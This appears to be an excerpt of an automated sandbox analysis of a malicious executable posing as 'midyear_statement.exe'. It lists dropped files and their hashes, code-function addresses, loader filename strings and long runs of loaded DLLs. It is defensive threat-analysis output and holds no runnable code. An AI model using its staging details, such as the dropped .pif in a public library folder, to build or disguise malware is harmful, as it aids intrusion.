                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00446D8B27_2_00446D8B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00406E8F27_2_00406E8F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0040503828_2_00405038
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0041208C28_2_0041208C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004050A928_2_004050A9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0040511A28_2_0040511A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0043C13A28_2_0043C13A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004051AB28_2_004051AB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0044930028_2_00449300
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0040D32228_2_0040D322
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0044A4F028_2_0044A4F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0043A5AB28_2_0043A5AB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0041363128_2_00413631
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0044669028_2_00446690
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0044A73028_2_0044A730
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004398D828_2_004398D8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004498E028_2_004498E0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0044A88628_2_0044A886
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0043DA0928_2_0043DA09
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00438D5E28_2_00438D5E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00449ED028_2_00449ED0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_0041FE8328_2_0041FE83
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00430F5428_2_00430F54
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\wkrriuhD.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: Joe Sandbox ViewDropped File: C:\Windows \System32\2506803.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: String function: 040A47D0 appears 931 times
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: String function: 040A4470 appears 67 times
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: String function: 040A4668 appears 250 times
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: String function: 040B7B88 appears 45 times
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: String function: 040A660C appears 33 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 004169A7 appears 87 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 004165FF appears 35 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 005C5552 appears 41 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 00422297 appears 42 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 12364E10 appears 54 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 00592C47 appears 34 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 0040A6C4 appears 68 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 12332093 appears 50 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 005C5BF2 appears 54 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 00444B5A appears 37 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 12331E65 appears 35 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 00413025 appears 79 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 12364770 appears 41 times
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: String function: 00416760 appears 69 times
                      Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                      Source: midyear_statement.exeBinary or memory string: OriginalFilename vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
                      Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: archiveint.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: eamsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
